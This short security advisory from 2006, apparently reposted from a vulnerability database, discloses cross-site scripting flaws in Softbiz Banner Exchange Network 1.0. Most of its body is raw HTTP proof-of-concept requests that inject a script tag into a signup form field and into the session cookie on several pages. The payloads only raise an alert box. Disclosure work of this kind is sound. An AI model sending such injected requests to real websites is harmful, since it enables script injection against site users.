Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13371
HistoryJun 30, 2006 - 12:00 a.m.

Softbiz Banner Exchange 1.0 XSS

2006-06-3000:00:00
vulners.com
9

Softbiz Banner Exchange Network 1.0
http://softbizscripts.com

Cross Site Scripting (XSS)

POST http://target.xx:80/insertmember.php HTTP/1.0
Accept: /
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 152
uname=1&add=1&city="><script>alert(/Ellipsis+Security+Test/)</script>&state=1&country=0&url=http%3A%2F%2F&email=1&pwd=1&pwd2=1&submit=Signup

GET http://target.xx:80/lostpassword.php HTTP/1.0
Accept: /
Host: target.xx
Cookie: PHPSESSID="><script>alert(/Ellipsis+Security+Test/)</script>

GET http://target.xx:80/gen_confirm_mem.php HTTP/1.0
Accept: /
Host: target.xx
Cookie: PHPSESSID="><script>alert(/Ellipsis+Security+Test/)</script>

GET http://target.xx:80/index.php HTTP/1.0
Accept: /
Host: target.xx
Cookie: PHPSESSID="><script>alert(/Ellipsis+Security+Test/)</script>

Ellipsis Security
http://ellsec.org